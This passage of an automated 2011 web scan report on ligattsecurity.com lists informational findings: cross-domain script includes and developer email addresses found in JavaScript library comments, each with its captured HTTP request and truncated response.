HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:37:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.9. http://www.ligattsecurity.com/solutions/boobytrap previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /solutions/boobytrap |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /solutions/boobytrap HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.10. http://www.ligattsecurity.com/solutions/hacker-in-15-minutes previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /solutions/hacker-in-15 |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /solutions/hacker-in-15 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32468 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.11. http://www.ligattsecurity.com/wp-content/themes/elite-force/favicon.ico previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:33:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Tue, 01 Feb 2011 15:33:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28228 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
7. Email addresses disclosed previous
There are 2 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).7.1. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The following email address was disclosed in the response:- drew.diller@gmail.com
Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:02 GMT Server: Apache/2.2.9 (Fedora) Last-Modified: Sat, 14 Aug 2010 02:41:33 GMT ETag: "aa80bb-1bcb-48dbf89 Accept-Ranges: bytes Content-Length: 7115 Connection: close Content-Type: application/x-javascript /** * DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>. * Author: Drew Diller * Email: drew.diller@gmail.com * URL: http://www.dillerdesign * Version: 0.0.8a * Licensed under the MIT License: http://dillerdesign.com * * Example usage: * DD ...[SNIP]... |
7.2. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js previous
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The following email address was disclosed in the response:- brian@cherne.net
Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:02 GMT Server: Apache/2.2.9 (Fedora) Last-Modified: Sat, 14 Aug 2010 02:41:34 GMT ETag: "aa80bc-759c-48dbf89 Accept-Ranges: bytes Content-Length: 30108 Connection: close Content-Type: application/x-javascript jQuery.noConflict(); jQuery(document).ready //Loading Thumbs jQuery('.entry-portfolio function () { var img_path = jQuery(this).attr('title' ...[SNIP]... <brian@cherne.net> ...[SNIP]... |
Report generated by XSS.CX at Sat Apr 23 06:47:08 CDT 2011.